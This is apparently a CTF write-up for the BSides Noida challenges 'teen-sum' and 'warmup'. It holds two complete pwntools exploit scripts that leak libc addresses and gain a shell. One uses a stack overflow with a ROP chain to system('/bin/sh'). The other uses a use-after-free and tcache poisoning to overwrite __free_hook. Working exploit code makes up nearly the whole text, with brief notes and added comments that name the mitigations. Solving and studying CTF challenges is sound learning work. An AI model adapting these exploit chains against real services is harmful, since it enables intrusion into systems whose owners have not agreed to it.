还有一道musl uaf和一道kernel rop

之后补上（如果记得的话）

teen-sum

$checksec teen-sum
[*] '/home/wendy/Desktop/BSides-Noida-CTF-master/Pwn/teen-sum/teen-sum'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: '.'

两次机会输入name,一次泄露栈内容得到libc

一次栈溢出,注意要把name_sz覆盖为数字,同时glibc2.23以上版本的栈溢出需要加ret调栈

# -*- coding: UTF-8 -*-
from pwn import *
import sys
context.log_level='debug'  # pwntools echoes every byte sent/received, which makes the I/O sequence below auditable
context.arch='amd64'  # matches the checksec output above (amd64-64-little); p64()/u64() pack for this word size
binary='./teen-sum'
elf=ELF(binary)
# Local copy of the challenge libc; every hard-coded offset below is only meaningful for this exact build.
libc = ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc.so.6')
flag=0  # 0: run the binary locally; non-zero: connect to the challenge server
if flag:
    sh = remote('39.96.88.40', 7020)
else:
    sh = process(binary)
# Short aliases over the pwntools tube API.
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
ti = lambda : sh.interactive()
leak = lambda name,addr :log.success(name+':'+hex(addr))  # log a named address in hex

# 0x227e0a
# 0x48
# NOTE(review): scratch offsets from the author; the code below subtracts 0x223e0a, not 0x227e0a --
# confirm which value matches the libc build loaded above.

# Two name prompts; the write-up above says one of them echoes stack contents that include a libc pointer.
sla('> ',str(0x10))
sla('> ','')
# Read up to the first 0x7f byte, take the last 6 bytes as a little-endian pointer, and rebase to libc.
libc_base = u64(ru('\x7f')[-6:].ljust(8,'\x00')) - 0x223e0a
leak('libc_base',libc_base)
binsh=libc_base+next(libc.search(b'/bin/sh'))
# Gadget offsets hard-coded for the libc build above (the names suggest a pop-rdi gadget and a bare ret).
pop_rdi = libc_base+0x0000000000026b72
system = libc_base+libc.sym['system']
ret = libc_base+0x0000000000025679

# Menu navigation; the prompts these '1' answers belong to are not visible in this write-up.
sla('> ','1')
sla('> ','1')
sla('> ','1')
pause()  # manual stop so a debugger can be attached before the resize
sla('New size please.> ',str(0x100))
pause()
# Overflow payload. Per the write-up, name_sz has to be overwritten with a numeric value (presumably the p64(0))
# and the extra ret keeps the stack 16-byte aligned before system() on glibc >= 2.23.
# NOTE(review): str and bytes are concatenated here and in the ljust() above, so this only runs on Python 2 pwntools.
# Mitigation note: checksec above reports no stack canary; a canary or a bounds-checked name read would stop this overflow.
sla('> ','a'*0x38+p64(0)+'a'*8+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system))
# gdb.attach(sh)  # uncomment to attach a debugger before handing over the session
ti()

warmup

malloc没有清空chunk,可以泄露libc,这里写入的时候会在size-1处置0,puts输出会被截断,但是size为0就不影响泄露了

然后有一次uaf机会,打tcache,注意2.32版本多了一个key检查

# -*- coding: UTF-8 -*-
from pwn import *
import sys
context.log_level='debug'  # pwntools echoes every byte sent/received; useful for auditing the menu I/O below
context.arch='amd64'  # p64()/u64() pack 64-bit little-endian words

binary = './warmup'
elf=ELF(binary)
# Local copy of the challenge libc (2.32 build); the leak offset in leaklibc() is tied to this exact file.
libc = ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.32-0ubuntu3_amd64/libc.so.6')
flag=0  # 0: run the binary locally; non-zero: connect to the challenge server
if flag:
    sh = remote('47.104.70.90', 25315)
else:
    sh = process(binary)

# Short aliases over the pwntools tube API.
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
ti = lambda : sh.interactive()
leak = lambda name,addr :log.success(name+":"+hex(addr))  # log a named address in hex
def leaklibc():
    """Read a libc pointer from pending output and publish libc_base plus a few symbol addresses as globals.

    Expects a preceding show() to have left a libc pointer on the tube: everything up to the first
    0x7f byte is consumed and the last 6 bytes are taken as the pointer. The 0x1e4030 offset is specific
    to the libc file loaded at the top of the script. Note that binsh_addr, _IO_2_1_stdout_ and
    _IO_list_all are declared global but never assigned here, and only __free_hook and system are
    used later in this script.
    """
    global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_,_IO_list_all,realloc
    # NOTE(review): ljust() with a str on a bytes result only works under Python 2 pwntools.
    libc_base = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x1e4030
    success('libc_base = '+hex(libc_base))
    __malloc_hook=libc_base+libc.sym['__malloc_hook']
    __free_hook=libc_base+libc.sym['__free_hook']
    system=libc_base+libc.sym['system']
    realloc=libc_base+libc.sym['realloc']
def cmd(index):
    """Answer the main-menu prompt ('> ') with option number `index`."""
    sla('> ', str(index))
def add(index,sz,data):
    """Menu option 1: allocate slot `index` with `sz` bytes and send `data` raw (no trailing newline).

    The author's notes give the binary's limits as idx 0-15 and sz <= 0x1000; neither is checked here.
    """
    cmd(1)
    sla('idx: ',str(index)) #0-15
    sla('sz: ',str(sz)) #<=0x1000
    sa('data: ',data)  # sent with sendafter, so the caller controls whether a newline is included
def edit(index,data):
    """Menu option 3: overwrite the contents of slot `index` with `data` (sent raw)."""
    cmd(3)
    sla('idx: ',str(index))
    sa('data: ',data)
def show(index):
    """Menu option 2: ask the binary to print slot `index`; the caller reads the output itself."""
    cmd(2)
    sla('idx: ',str(index))
def dele(index):
    """Menu option 4: free slot `index`."""
    cmd(4)
    sla('idx: ',str(index))
def save(index):
    """Menu option 5 on slot `index`. What the binary does for 'save' is not visible in this write-up;
    the main script uses it between two dele() calls, which the author describes as the one UAF chance.
    """
    cmd(5)
    sla('idx: ',str(index))


# Populate five slots; slot 1 is the large one whose freed contents are read back below.
add(0,0x10,'a')
add(1,0x500,'b')
add(2,0x20,'a')
add(3,0x20,'a')
add(4,0x20,'a')

dele(0)
dele(1)

# Per the write-up, malloc hands back uncleared memory and a size of 0 avoids the terminating 0 byte,
# so show() prints whatever the freed chunk still holds.
add(0,0,'')
show(0)
ru('data: ')
key = u64(rc(5).ljust(8,'\x00'))  # 5 stale bytes from the old chunk; NOTE(review): str/bytes mix, Python 2 only
leak('key',key)

add(1,0,'')
show(1)
leaklibc()  # the stale contents of slot 1 are expected to contain a libc pointer

dele(3)
save(4)
dele(4)

# The single use-after-free the write-up mentions: slot 4 is written after it was freed.
# The XOR/shift terms presumably account for the glibc 2.32 key check the author refers to -- not verifiable from here.
# Mitigation note: clearing the slot pointer on free (and rejecting edits to freed slots) removes this step entirely;
# the __free_hook target itself no longer exists in recent glibc releases.
edit(4,p64(__free_hook^key) + p64((key<<12) + 0x10) + '\n')
add(5,0x20,'/bin/sh\x00\n')
add(6,0x20,p64(system)+'\n')
dele(5)
# gdb.attach(sh)  # uncomment to attach a debugger before handing over the session
ti()